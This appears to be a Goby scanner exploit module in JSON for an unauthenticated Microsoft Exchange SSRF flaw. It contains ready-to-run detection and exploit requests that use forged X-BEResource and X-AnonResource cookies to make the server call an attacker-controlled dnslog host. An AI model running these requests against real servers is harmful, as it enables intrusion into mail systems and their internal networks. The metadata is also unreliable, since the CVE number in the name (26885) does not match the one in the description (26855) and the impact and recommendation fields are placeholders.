{ "Name": "Microsoft Exchange SSRF漏洞 CVE-2021-26885", "Level": "1", "Tags": [ "SSRF" ], "GobyQuery": "(app=\"Microsoft-Exchange\" || title=\"Outlook\")", "Description": "Exchange Server 是微软公司的一套电子邮件服务组件,是个消息与协作系统。2021年03月3日,微软官方发布了Microsoft Exchange安全更新,披露了多个高危严重漏洞,其中:在 CVE-2021-26855 Exchange SSRF漏洞中,攻击者可直接构造恶意请求,以Exchange server的身份发起任意HTTP请求,扫描内网,并且可获取Exchange用户信息。该漏洞利用无需身份认证", "Product": "Exchange", "Homepage": "microsoft.com", "Author": "PeiQi", "Impact": "

🐏

", "Recommandation": "

undefined

", "References": [ "http://wiki.peiqi.tech" ], "HasExp": true, "ExpParams": [ { "name": "Dnslog", "type": "input", "value": "xxx.dnslog.cn", "show": "" } ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/ecp/PeiQi.js", "follow_redirect": false, "header": { "Cookie": "X-BEResource=peiqi_wiki/api/endpoint#~1; X-AnonResource=true" }, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "500", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "NegotiateSecurityContext", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/owa/auth/PeiQi.js", "follow_redirect": false, "header": { "Cookie": "X-AnonResource=true; X-AnonResource-Backend={{{Dnslog}}}/ecp/default.flt?~3; X-BEResource={{{Dnslog}}}/owa/auth/logon.aspx?~3;" }, "data_type": "text", "data": "" }, "SetVariable": [ "output|lastbody" ] } ], "PostTime": "2021-03-13 14:34:38", "GobyVersion": "1.8.237" }